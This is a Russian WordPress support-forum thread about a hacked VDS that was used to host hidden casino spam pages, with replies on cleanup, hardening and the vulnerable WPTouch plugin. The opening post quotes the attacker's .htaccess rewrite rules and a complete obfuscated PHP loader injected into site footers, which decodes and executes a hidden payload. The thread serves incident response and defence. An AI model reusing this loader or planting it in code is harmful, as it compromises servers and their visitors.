Поддержка Проблемы и решения Взломан сервер

  • Решено TTrex

    (@ttrex)


    Доброе время суток.

    У меня был взломан сервер не так давно. Взломщик очень интересно использовал мои сайты. На них появились левые страницы с рекламой казино Вулкан(кстати, очень интересно что об этом скажет само казино). Страниц появляется обычно не больше сорока. В итоге человек может попросту не заметить такое «пополнение».

    При попытке починить следы проникновения пришел в ужас. Были внесены изменения в .htaccess и в огромное количество файлов и папок. Появились десятки файлов, которые вполне правдоподобно копируют структуру WordPress и носят названия вполне реально существующих файлов.

    Пример изменения .htaccess:

    RewriteCond %{QUERY_STRING} ^a1=(.*)
    RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L]

    Строка RewriteCond %{QUERY_STRING} ^a1=(.*) я так понял отвечает за генерацию страницы на сайте жертвы. В URL входит это буквосочетания a1.

    Строка RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L] обращается в свою очередь к папке, которую создал злоумышленник в нормальной директории /wp-admin/css/ в ней находится огромное количество файлов, которые явно не входят в структуру лицензионного оригинального WordPress.

    Кроме того, в каждом футере сайтов был прописан следующий код:

    <?php $Dh0jnHB="FyEpKPIQcokW7q7XOlxDfZ1XVGTP1Q3CEsngkGtzLA8a90HXR//KxlJK8ce1mGrtAhgf0F5elLnTnmblUb+tgj7BZ102utSpA+u6uey1nJfwUX0dnqnm0R4DP360yBayWAt3f6ZlnbX1AiLfsTGCTj2Kdh1WJlA78kCwdcqLm6u0iAKhvV+/gej3PW9OuVWshM+GkgaplBqrfS4YBfo3MiKF+yiv9LJsv5ZJY6gB3U83imcIAegxymigNhdEKJQ9JPWfL2AtNhdMKL3/xJLh/ViK+gVTBKaCk6ybMglQDq1QX89faddSB079gtZ7sNfsYfMOX0jIw7YDrG128hUmx/vi87keQim6JkCuwz/yiNSNT3DmrEIqqQVNDqLQGiE20ZziILtVOLpsUcP8oEHlcE5qSIfxb/9X5ldgtTvZKDwKpdg7pTUSJiCb9Y8bR4KIu5bbhf+dBlW4ojLOTUfAG9sVb1gTS/9K14O8UarJZOEin4I2C4nM4kzl1voN1h57VnZAvfSeDwCyU23ruzwW0XiYIN5Sq7cK9qVht8BaPOBSRUQP0qVBGUWj+bSzkIK/fcNG03WYKWjM49buwpawd+J5moTdUl3KJwwsXAhK0KxfnzRSs/dg7YP2QGyiTj092ZmiqdYX+HIHbkVnZh021XRjcDEmCuRG2bNMb7r9vwboRSgHQV6/UpNHKyFcAsJ2fRdmlFD0vukJknSeHfsEYbseMPtQwYXDCbgGKD5uiTodeJFjJ0VvVXNniA7PIoytCu6MFlU6WlBxgFW1ZPPcBwAgvkDzwgxSB/E1Z1nRsLVcnCDD5VsxxmLXPUhq1QZjLovRZSMvqzFBUUnbuvfzrqzaOScGVoVSr8NUWo/ZyNgy4sYrY8u7kY3Quia8fZ48/qGLngrXrc3ob4Nybp5siG9goaEictUlPHizcdj+qdQFMoZFH8UM2ZmgorF5aSAfFa4R8VYIzjTcMMyxTX0kTpGYroTPTcaVgm18snCim8UeV6IK8QcmZ5ICxMBkN/ekwtcsf/Wsrc2jc/5mZwO5pATPtqSi9lVt1wkYlVcJ83ASqXWQW5zDAmub0Gl3pOv0PiGZgYH1EzyLFmoSKOdCod8eHlC+NG6+1eawFYN2Wk3+Rp9Y32tVhddwd6NsUUVfXNjLzHfDMjzenlrYbJpRedXtBv3lMTFok1VTA9AxEc5z11ng7M5zYPOPNoJmL3XjKPTJKtPNai45sC7fRqQYzjHUM6nLO6RXxH3735a+Zf4mHjKlGwPT8vre1EJs/Z2OMwRsIUKXk1B1/R1fRg2Qx6oaVe8LiQlP3RNSbrstxNsxnJi5u5s5ej3tktSKW5AX5j+CV/xEtb96pCcLJFUArKO0XQ==";$lrdNj6Us="\x62\x61\x73";$gFctuyg="\x61";$RQMZ8S="Fl1YmASDI3UWZZwX83PlIpxcFiUYZtfg1bNWnIdeyVMJ5Xr";$mMJoXP5="\x73\164";$uMZQ71Pw="\x67\172\x69";$gFctuyg.="\x73";$mMJoXP5.="\x72\x5f\x72";$lrdNj6Us.="\145\x36\x34";$RQMZ8S.="7WqfdXIzeONK6EyxR2lbyyKv4O4LcJnsyS2zbuCv4r0MTzg";$uMZQ71Pw.="\156\x66";$lrdNj6Us.="\x5f\x64\145\143";$uMZQ71Pw.="\x6c\x61";$gFctuyg.="\163\145";$mMJoXP5.="\157\x74";$RQMZ8S.="fnJZBLAbLTEhMjaen2WfjDCqixwPXA/XVHhNKEZSJkzaStp";$mMJoXP5.="\61\x33";$uMZQ71Pw.="\x74\x65";$gFctuyg.="\162\164";$lrdNj6Us.="\x6f\144\145";$RQMZ8S.="LtIpTSIf1uAGJhUIWOQIHc9bjYAQDCXAJQzNnKHAn0O";@$gFctuyg($uMZQ71Pw($lrdNj6Us($mMJoXP5($RQMZ8S))));?>

    Масштабы поражения системы просто ужасны. Было потрачено часов восемь, чтобы просто осознать, что все сайты по сути надо удалять и заново заливать. Изменения в структуру CMS внесены очень глобальные и серьезные. И не факт, что я заметил все.

    Вопрос в следующем — как вы думаете, следует ли мне поменять хостера? У них все валят на уязвимости в WordPress.

    И как мне вообще теперь поступить? Даже восстановив систему, я могу просто получить повторение разрушительного хака.

Просмотр 15 ответов — с 1 по 15 (всего 18)
  • Модератор Yui

    (@fierevere)

    ゆい

    не факт что смена хостера будет в лучшую сторону

    все сайты по сути надо удалять и заново заливать

    т.е. по сути вы все переставили? через экспорт контента xml или дамп базы? или выборочно почистили?

    http://revisium.com/ai/

    вот этим можете пройтись по своим сайтам

    а дальше ? аудит, или инструментами ОС ( скрипты ) или есть плагины мониторящие изменения файлов непосредственно для wordpress

    а хостеры свою дырявость не признают никогда… рекомендовать же переход на vps — требуется опыт в системном администрировании

    Автор TTrex

    (@ttrex)

    Дело в том, что хакнули VDS. И не самый дешевый.

    Модератор Yui

    (@fierevere)

    ゆい

    ну тогда причем тут хостер? если только вломали не через гипервизор или хостер оказывает (такие вот фиговые) услуги сис администрирования
    цена впс значения для взломщика не имеет

    Дело в том, что хакнули VDS. И не самый дешевый.

    Ну по взломам я конечно не спец, если файлы не открыты для записи извне, то доступ к ним может получить только пользователь созданного виртуального хоста, ну или там админ сервера. Значит данные аккаунта слиты что-ли…

    У них все валят на уязвимости в WordPress.

    Ну тут речь скорее всего про уязвимости в плагинах, большинство бед от них. Мне так кажется.

    И как мне вообще теперь поступить?

    После восстановления движков (это достаточно простая процедура) убедиться, что используются легальные и актуальные плагины и темы.

    Проверить наличие «левых» файлов. Простая синхронизация в этом поможет.

    Обязательно проверить ВДС за пределами document_root. Встречалось, что злоумышленники там размещали скрипты для спама.

    Так же можно проверить файлы айболитом.

    Проверить локальный ПК на вирусы и сменить пароли доступа.

    Модератор Юрий

    (@yube)

    Ivan Komarov, увы, не во всем виноваты плагины и Темы с помоек. См. Найдена XSS уязвимость в ядре WordPress, версии 4.2 и ниже — WP Magazine

    На самом деле по моим далеко не прошаренным знаниям в управлении серверами проблемы могут быть много где. Как и написали выше дырки могут быть как и в самом WordPress, его плагинах, темах и т. п., так и в настройках сервера:

    1. Перебор паролей к FTP (нет никакого фаервола, который блокировал бы IP после пары неверных попыток).
    2. Открытый доступ к БД из вне по логину и паролю (тоже можно перебором войти и добавить свои Cron-таски в WordPress БД и все, далее какой-нибудь bash-скрипт создастся и сервер взломан полностью).
    3. Дырки в софте сервера (старый софт, пропатченный злоумышлениками софт).

    При не очень правильной настройке сервера, а также должной настойчивости ломающих можно и в самой ОС сервера оставить запасные двери для перезалития всего, что у вас появилось. Можно дополнительную учетку создать, можно дополнительные SSH-ключи куда-нибудь в хитрое место прописать (и смена паролей рекомендованная выше не поможет, я например себе вообще выключал вход по паролям на сервер, оставив лишь ssh-ключи). Также злоумышленники могли поставить какой-то свой софт на сервер, который вы даже не увидите — через консоль вообще мало что видно, если вы не эксперт 🙂

    Так что я бы рекомендовал еще и внимательно к серверу и его настройкам отнестись. Я считаю, что не будучи системным администратором по основному своему направлению работы, не стоит и браться за настройку серверов — это непростая работа, а чтобы диагностировать что-либо после взлома, так очевидно, что надо полностью разбираться в стуктуре ОС, понимать как работает каждое приложение, уметь анализировать логи и т. д.

    Касательно самого WordPress проверить целостность ядра можно с помощью WP-CLI — там есть команда, которая проверяет все файлы ядра и говорит, изменены ли они или нет. http://wp-cli.org/commands/core/verify-checksums/

    Резюмируя. Задумайтесь о смене VDS на хостинг, настройкой которого занимаются специальные люди. Несмотря на возможности полной настройки VPS (VDS) — это скорее бремя, чем преимущество, потому что держать свой выделенный сервер и заниматься его настройкой это дорого и сложно (можно настраивать самому, но выше было описано, почему этого делать не стоит). Хостинг не обязательно должен быть Shared, сейчас есть другие предложения, когда вам дают VPS без рута и настройкой занимаются специалисты. Например, https://pressjitsu.com — насколько я понимаю, один из основателей Константин Ковшенин 🙂

    P. S. Прошу всех любителей VPS не ругаться и кричать, а реально подумать о том, сколько всего требуется для настройки сервера, ведь прочтением пары статей в сообществе Digital Ocean экспертом не станешь.

    Модератор Yui

    (@fierevere)

    ゆい

    (нет никакого фаервола, который блокировал бы IP после пары неверных попыток).

    fail2ban, но его надо поставить и настроить

    доступ к БД из вне по логину и паролю

    bind-address = 127.0.0.1

    сейчас по умолчанию почти везде, надо быть злобным буратиной чтобы разрешить это на все интерфейсы

    не ругаться и кричать

    просто уточнила 2 момента

    cтарый дырявый плохо настроеный софт — да, очень вероятно, даже гораздо более вероятнее чем какие-то дыры в wordpress и обвязке

    Автор TTrex

    (@ttrex)

    Короче, оказалось что это уязвимость плагина WPTouch

    При помощи вредоносного кода активируется некая base 64, упоминание о вызове этой базы были найдены в ядре плагина WPTouch

    Уязвимость оказалась старой, июль 2014 года. В тот раз пронесло, в этом году прилетело по-жестокому.

    http://blogproblog.com/uyazvimost-v-plagine-wptouch/

    Все, у кого установлен плагин WPTouch и не обновлен до последней версии, под ударом.

    А мне теперь остается только переустанавливать сервер полностью и перезаливать все сайты заново.

    А мне теперь остается только переустанавливать сервер полностью и перезаливать все сайты заново.

    Рекомендую сразу установить этот плагин. Он покажет совместимость др плагинов.
    Так же помешает и этот.

    TTrex

    Уязвимость оказалась старой, июль 2014 года. В тот раз пронесло, в этом году прилетело по-жестокому.

    Извините, но проблема не в плагине, а чуть глубже, она в вас 🙂

    Автор TTrex

    (@ttrex)

    Что вы имеете ввиду, когда говорите, что проблема во мне?

    Ну вы виноваты в том, что не приняли никаких мер по обновлению. Если есть уязвимость, то не сомневайтесь, к вам, рано или поздно, придут.
    Без обид, сам попадал на такое, все откладывал и откладывал, пока клиент не написал, что у него вместо сайта открываются какие то веселые картинки.

    Автор TTrex

    (@ttrex)

    Вы совершенно правы.

    С другой стороны — вряд ли найдется такой человек, у которого каждый день есть свободное время на то, чтобы проверять. Какие там на этот раз дыры создали кодеры и какие там самые модные методы взломов. Жизнь как-то своим чередом идет, и не любой из нас станет возиться.

    К чести хакера хочу сказать, что сделано все было очень изящно, красиво и в расчете на то, что никто вообще не заметит.

    Вы даже не сомневайтесь в том, что я не один так попал. Другие просто не заметили еще даже, что их сайты кто-то бомбанул. И когда они полезут в интернет искать, что это за лажа, вылезут на этот топик. А мне это все стоило пять суток растраченных безвозвратно нервов. Из них двое суток в алкогольном кумаре.

Просмотр 15 ответов — с 1 по 15 (всего 18)
  • Тема «Взломан сервер» закрыта для новых ответов.